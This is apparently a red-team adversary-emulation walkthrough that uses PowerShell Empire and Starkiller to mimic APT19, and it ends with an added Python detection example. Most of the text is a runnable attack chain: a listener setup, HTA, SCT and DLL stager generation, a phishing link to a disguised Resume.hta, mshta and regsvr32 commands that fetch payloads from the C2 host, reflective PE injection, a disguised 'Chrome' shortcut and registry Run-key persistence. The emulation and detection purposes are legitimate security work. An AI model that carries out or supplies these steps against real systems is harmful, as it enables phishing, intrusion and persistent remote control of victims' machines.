Demo of Empire with Starkiller is in this Red Team Village event video where I emulate APT19:
Install on Kali:
sudo apt install powershell-empire
Install on Ubuntu:
cd /opt
sudo git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
Download Starkiller if you want a GUI:
cd /opt
sudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.0.0/starkiller-1.0.0.AppImage
sudo chmod +x starkiller-1.0.0.AppImage
Run Empire:
sudo empire
On Kali:
sudo powershell-empire
Run Empire for connectivity through Starkiller if you want a GUI:
sudo empire --rest --username <user> --password <password>
Open Starkiller:
cd /opt/starkiller
./starkiller-1.2.2.AppImage
Login to Starkiller:
Name: localhost:1337
Username: <user>
Password: <password>
This walkthrough uses an adversary emulation plan for APT19 as an example: https://www.scythe.io/library/threatthursday-apt19
Tactic | Description |
Description | APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. |
Goal and Intent | Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks. |
Command and Control | Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server |
Initial Access | Spearphishing Attachment (T1193); Spearphishing Link (T1192) |
Execution | PowerShell (T1086); User Execution; Hidden Window (T1143) - used |
Discovery | System Owner/User Discovery (T1033); System Information Discovery (T1082); System Network Configuration Discovery (T1016) |
Persistence | Registry Run Keys / Startup Folder (T1060) - establishes persistence by setting the Registry key |
Defense Evasion | Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques |
Create Listener
Type: http
Name: http
Host: http://10.0.0.187
Port: 80
BindIP: 10.0.0.187
Jitter: 0.5
StagingKey: georgy
Generate Stager HTA:
Type: windows/hta
Listener: http
Base64: True
Language: powershell
Outfile: /tmp/Resume.hta
Generate Stager SCT:
Type: windows/launcher_sct
Listener: http
Base64: True
Language: powershell
Generate Stager DLL:
Type: windows/dll
Listener: http
Arch: x86
Language: powershell
OutFile: /tmp/launcher.dll
Optional fields:
Obfuscate: True
ObfuscateCommand: Token\String\1
Download the stagers to /tmp and serve with SimpleHTTPServer
cd /tmp
python -m SimpleHTTPServer 8080
Email with link to Resume.hta
Show execution of HTA file:
mshta http://10.0.0.187:8080/Resume.hta
Migrate to another process with reflective PE injection: https://www.bc-security.org/post/reflective-pe-injection-in-windows-10-1909/
See processes running:
ps
usemodule code_execution/invoke_reflectivepeinjection
set ProcID: <processID>
set DllPath: /tmp/launcher.dll
Discovery:
whoami
usemodule situational_awareness/host/antivirusproduct
usemodule situational_awareness/host/get_uaclevel
usemodule situational_awareness/host/winenum
Persistence:
usemodule persistence/userland/registry
set Listener: http
Open regedit HKCU\Software\Microsoft\Windows\CurrentVersion
Execution with regsvr32 and scripting. Created a shortcut called Chrome with Target set as:
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\regsvr32.exe /s /n /u /i:http:\10.0.0.187:8080\launcher.sct scrobj.dll"
cd C:\Users\<username>
upload /tmp/file
shell C:\Users\<username>\<executable>
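For the blue-team side of this emulation, here is an added detection example (not part of the original notes or of Empire/Starkiller) that runs three rules over constructed process-creation events shaped like the steps above: mshta pulling a remote HTA, regsvr32 loading a remote SCT through scrobj.dll (T1117), and a hidden-window PowerShell launcher with a Base64 -enc payload (T1086). The event fields, the sample command lines and the Base64 string are constructed for the example; real telemetry (for instance Sysmon Event ID 1) carries more fields.

```python
import re

# Constructed, simplified process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://10.0.0.187:8080/Resume.hta"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http:\10.0.0.187:8080\launcher.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"},  # benign local register
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -noP -sta -w 1 -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="},  # placeholder Base64
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

# Matches http:// as well as the backslash form (http:\) used in the shortcut target above.
URL_RE = re.compile(r"https?:[\\/]{1,2}\S+", re.IGNORECASE)

def is_remote_hta(ev):
    """mshta.exe fetching its HTA from a URL (the Resume.hta delivery step)."""
    return ev["Image"].lower().endswith("mshta.exe") and bool(URL_RE.search(ev["CommandLine"]))

def is_regsvr32_scriptlet(ev):
    """regsvr32 with /i:<url> plus scrobj.dll: remote SCT execution (Regsvr32, T1117)."""
    cl = ev["CommandLine"].lower()
    return (ev["Image"].lower().endswith("regsvr32.exe") and "/i:" in cl
            and "scrobj.dll" in cl and bool(URL_RE.search(cl)))

def is_hidden_encoded_powershell(ev):
    """Hidden-window PowerShell carrying a Base64 -enc payload (PowerShell T1086, Hidden Window T1143)."""
    cl = ev["CommandLine"].lower()
    hidden = " -w 1" in cl or "hidden" in cl
    encoded = re.search(r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", cl) is not None
    return ev["Image"].lower().endswith("powershell.exe") and hidden and encoded

RULES = [
    ("Remote HTA launched via mshta", is_remote_hta),
    ("Regsvr32 scriptlet from URL (T1117)", is_regsvr32_scriptlet),
    ("Hidden encoded PowerShell launcher (T1086)", is_hidden_encoded_powershell),
]

def detect(events):
    """Return (rule name, command line) pairs for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev["CommandLine"]))
    return hits
```

Calling detect(SAMPLE_EVENTS) flags the mshta, regsvr32 and PowerShell events and leaves the benign regsvr32 and notepad events alone; the Run key written by the persistence module above is a registry event, not a process event, and needs a separate rule on registry telemetry.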
Using Empire with Starkiller: How to from BC-Security